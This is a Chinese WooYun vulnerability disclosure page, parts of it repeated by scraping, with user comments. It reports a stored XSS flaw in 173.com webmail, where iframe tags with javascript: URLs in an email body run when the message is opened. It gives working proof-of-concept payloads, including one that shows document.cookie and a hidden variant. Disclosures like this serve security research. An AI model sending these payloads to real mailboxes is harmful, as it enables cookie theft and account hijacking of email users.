173邮箱存储型XSS无需点击自动触发（支持所有浏览器）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0110408

漏洞标题：173邮箱存储型XSS无需点击自动触发（支持所有浏览器）

漏洞作者： AK-47

提交时间：2015-04-26 10:43

修复时间：2015-06-10 10:44

公开时间：2015-06-10 10:44

漏洞类型：xss跨站脚本攻击

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-04-26：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-06-10：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

173玩家口袋邮箱，由于在邮件正文中对用户输入的内容没有做好充分过滤，导致存在一处高危存储型跨站漏洞。无需用户交互，打开邮件方可自动触发，支持所有浏览器。同时不法分子可以利用该漏洞做很多对用户不利的事，包括盗取用户cookie、钓鱼、挂马、劫持用户密码、下载用户所有信件等……

详细说明：

邮箱链接：https://mail.173.com/
注册账号：略
首先：经过一番邮件主题、发件人昵称、收件人昵称等多处输入测试，发现过滤的挺严没什么大问题。
其次：来到正文，发送如下payload

<iframe src="javascript&colon;confirm(2)"></iframe>

打开邮件便可触发，同时这种姿势支持所有浏览器，如下图：

对应源代码如下图：

备注: 后来发现使用iframe标签正常姿势也可以触发，例如：

<iframe src="javascript:alert(1)"></iframe>

再次：来弹一下cookie吧，发送如下内容:

<iframe src="javascript:alert(document.cookie)"></iframe>

打开邮件便可看到如下景象：

最后：为了增加隐蔽性，隐藏iframe边框，构造如下完美payload：

<iframe src="javascript:alert(/xss/)" style="display:none"></iframe>

漏洞证明：

邮件内容发送如上完美payload，见下图：

修复方案：

过滤，再过滤 ……

版权声明：转载请注明来源 AK-47@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：15 (WooYun评价)

漏洞评价：

2015-04-26 11:49 | 玉林嘎 ( 普通白帽子 | Rank:758 漏洞数:96 )

春哥好
2015-04-26 11:56 | AK-47 ( 路人 | Rank:15 漏洞数:1 | 开开心心挖洞，踏踏实实上学！)

@玉林嘎这么直白？？
2015-04-26 12:03 | 楊铣僧 ( 路人 | Rank:4 漏洞数:3 | 一个从xss练起的无名小子)

哈哈哈，来踩下，我一会也发个！组团来挖邮箱了
2015-04-26 12:06 | AK-47 ( 路人 | Rank:15 漏洞数:1 | 开开心心挖洞，踏踏实实上学！)

@楊铣僧 66666 加油！
2015-04-26 12:42 | mayafei ( 路人 | Rank:3 漏洞数:1 | 我爱洗澡好多泡泡)

。。。
2015-04-26 19:03 | 熊e太大 ( 路人 | Rank:4 漏洞数:2 | http://)

春哥好！
2015-04-26 19:03 | answer ( 普通白帽子 | Rank:347 漏洞数:45 | 答案)

春哥，带我日站
2015-04-26 19:04 | 砍菜的 ( 路人 | Rank:12 漏洞数:2 )

春哥，带我日站
2015-04-26 21:03 | AK-47 ( 路人 | Rank:15 漏洞数:1 | 开开心心挖洞，踏踏实实上学！)

@answer 膜拜霍霍牛！！
2015-04-26 21:05 | AK-47 ( 路人 | Rank:15 漏洞数:1 | 开开心心挖洞，踏踏实实上学！)

@熊e太大同好同好
2015-04-27 00:19 | 明月影 ( 路人 | Rank:12 漏洞数:8 | 学姿势，学思路。)

来加关注的。
2015-06-10 10:46 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

这又有15rank了？

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0110408

漏洞标题：173邮箱存储型XSS无需点击自动触发（支持所有浏览器）

相关厂商：173.com

漏洞作者： AK-47

提交时间：2015-04-26 10:43

修复时间：2015-06-10 10:44

公开时间：2015-06-10 10:44

漏洞类型：xss跨站脚本攻击

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 AK-47@乌云

漏洞回应

厂商回应：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0110408

漏洞标题：173邮箱存储型XSS无需点击自动触发（支持所有浏览器）

相关厂商：173.com

漏洞作者： AK-47

提交时间：2015-04-26 10:43

修复时间：2015-06-10 10:44

公开时间：2015-06-10 10:44

漏洞类型：xss跨站脚本攻击

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0110408"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 AK-47@乌云

漏洞回应

厂商回应：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：